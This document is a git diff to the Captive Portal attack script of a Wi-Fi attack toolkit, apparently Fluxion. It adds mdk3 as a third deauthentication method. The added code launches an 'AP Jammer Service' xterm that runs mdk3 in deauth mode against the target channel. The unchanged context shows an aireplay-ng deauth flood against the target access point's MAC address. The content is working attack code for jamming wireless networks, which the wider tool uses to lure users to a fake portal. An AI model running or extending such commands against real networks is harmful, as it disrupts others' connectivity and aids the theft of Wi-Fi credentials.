diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index fffa096..9da02fb 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -156,7 +156,8 @@ function captive_portal_set_ap_service() { echo -e "$FLUXIONVLine ${CClr}Select a method of deauthentication\n${CClr}" echo -e "${CSRed}[${CSYel}1${CSRed}]${CClr} mdk4${CClr}" -echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay\n${CClr}" +echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay${CClr}" +echo -e "${CSRed}[${CSYel}3${CSRed}]${CClr} mdk3\n${CClr}" read -p $'\e[0;31m[\e[1;34mfluxion\e[1;33m@\e[1;37m'"$HOSTNAME"$'\e[0;31m]\e[0;31m-\e[0;31m[\e[1;33m~\e[0;31m] \e[0m' option_deauth @@ -1539,6 +1540,14 @@ start_attack() { "aireplay-ng -0 0 -a $FluxionTargetMAC --ignore-negative-one $CaptivePortalJammerInterface" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! + + elif [[ $option_deauth -eq 3 ]]; then + + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! fi echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"